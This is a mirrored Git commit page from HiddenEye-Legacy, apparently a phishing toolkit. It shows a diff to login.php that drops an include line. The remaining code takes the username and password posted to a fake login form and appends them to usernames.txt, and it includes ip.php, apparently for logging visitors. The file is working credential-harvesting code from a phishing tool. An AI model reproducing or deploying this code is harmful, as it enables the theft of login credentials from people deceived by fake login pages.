mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Update login.php
This commit is contained in:
parent
1e438335a1
commit
cc8e1db1fc
|
@ -1,5 +1,4 @@
|
||||||
<?php
|
<?php
|
||||||
include 'base.php';
|
|
||||||
include 'ip.php';
|
include 'ip.php';
|
||||||
|
|
||||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||||
|
|
Loading…
Reference in New Issue
Block a user